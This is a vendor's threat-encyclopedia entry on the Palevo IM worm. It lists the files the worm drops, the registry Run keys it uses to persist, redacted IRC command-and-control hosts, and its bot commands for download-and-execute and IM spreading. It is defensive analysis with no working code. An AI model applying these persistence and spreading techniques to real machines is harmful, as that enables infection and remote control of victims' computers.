My Bitdefender
  • 0 Shopping Cart

SHARE
THIS ON

Facebook Twitter Google Plus

Worm.P2P.Palevo.DP

HIGH
HIGH
approx 100 kb
(Backdoor.Win32.IRCBot.oyd, Worm:Win32/Pushbot.RK, P2P-Worm:W32/Palevo.CF)

Symptoms

Unwanted messages sent to friends via IM clients containing a link to a photo.


Removal instructions:

Please let BitDefender disinfect your files.

Analyzed By

Bogdan TImofte, virus researcher Alexandru Maximciuc, virus researcher

Technical Description:

Worm.P2P.Palevo.DP spreads via automatically IM spam. The message tricks the users into saving what seems to be a .JPG file, which is, in effect, an executable concealing the malicious payload  – Worm.P2P.Palevo.DP. When the user tries to open the file, the malicious code is launched.

The worm creates four hidden files in the Windows folder:

    [FilePath]\infocard.exe
    [FilePath]\mds.sys
    [FilePath]\mdt.sys
    [FilePath]\winbrd.jpg

where [FilePath] can take one of the following values: %Windir%, %Public% or %ProgramFiles%, depending on whether it can write to the specific folder or not.

It then modifies some registry key to point to this files, in order to bypass the OS's firewall:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ [Firewall Administrating = "[FilePath]\infocard.exe"]

The worm establishes a connection to an IRC server at "dbs[removed]s.com" or "e2[removed]o.com" on port 2345 and waits for commands. It can respond to any of the commands as shown below:  


- "r.gf" - starts a thread that downloads a file and executes it.

- "r.gfstop" - stops the download-and-execute thread.

- "yah.msg" - sends Yahoo IM messages with an infected link

- "msn.msg" - sends both Yahoo and MSN IM messages with an infected link, example: 

".msn.msg foto :D http://[removed]image.php?= ". The infected links point to multiple domains hosting the worm.

- "msn.stop" - stops the running message-sending thread